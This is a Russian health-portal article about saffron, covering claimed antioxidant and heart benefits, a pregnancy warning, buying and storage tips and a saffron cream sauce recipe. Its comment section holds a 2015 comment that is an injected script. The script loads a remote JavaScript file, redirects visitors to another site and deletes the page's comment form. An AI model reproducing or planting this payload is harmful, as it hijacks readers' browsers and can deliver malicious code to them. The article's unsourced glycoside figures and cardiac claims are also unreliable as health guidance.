Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шафран. Специя для работы...  >>  Шафран. Специя для работы сердца
 
Обратная связь
 

Шафран. Специя для работы сердца

Размер шрифта
29 ноября 2011 08:13
  • google_analytics: false
  • Нравится

Как выбрать и как хранить шафран, и какое блюдо с ним приготовить?

Чем полезен шафран?

  1. В шафране много антиоксидантов: зеаксантина, ликопина, α-и β-каротина. Они защищают организм от свободных радикалов, стимулируют работу иммунитета.

  2. В шафране есть гликозиды. Под влиянием этих веществ сердце реже сокращается, но при этом сильнее выбрасывает кровь.

  3. Калий контролирует частоту сердечных сокращений и артериальное давление. Марганец и медь помогают бороться со свободными радикалами. Все эти микро- и макроэлементы также есть в шафране.

Пьедестал почета по содержанию гликозидов

1. Шафран – 13 мг/100г
2. Лакрица – 9 мг/100г
3. Горчица – 2 мг/100г

Шафран нельзя употреблять беременным, он может спровоцировать выкидыш.

Как выбрать

  • Будьте осторожны! Под видом шафрана чаще всего продают молотую куркуму – порошок рыжего цвета. Настоящий шафран продается в виде красно-коричневых цветочных рыльцев. 
  • Упаковка с шафраном должна быть герметичной, без повреждений.
  • Нити свежего шафрана быстро набухают и окрашивают воду в желтый цвет. Старые не дадут окраски.

Как хранить

Шафран надо хранить в пакете или деревянной посуде, в темном сухом месте. Со временем он бледнеет, высыхает и теряет аромат.

Как готовить

  1. Положить шафран на сковороду и разогреть на медленном огне. Он должен стать темно-красным.

  2. Можно сделать шафрановую воду. Для этого надо прогретую пряность растворить в стакане воды. Приготовленную воду хранить в холодильнике и использовать в течение месяца.

Соус из шафрана

  • Шафран – 10-15 шт.
  • Сливки – 120 мл
  • 1 ст. л. сухого белого вина
  • 1 луковица
  • Соль, перец
  1. Залить шафран теплой кипяченой водой.

  2. Обжарить лук, добавить настой шафрана, убавить огонь.

  3. Через минуту залить лук вином и постепенно ввести сливки.

  4. Соус подается к рыбе и морепродуктам и к грибам. Хорош он и с макаронами.

 

Сюжеты по теме
Шафран. Драгоценная пряность

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.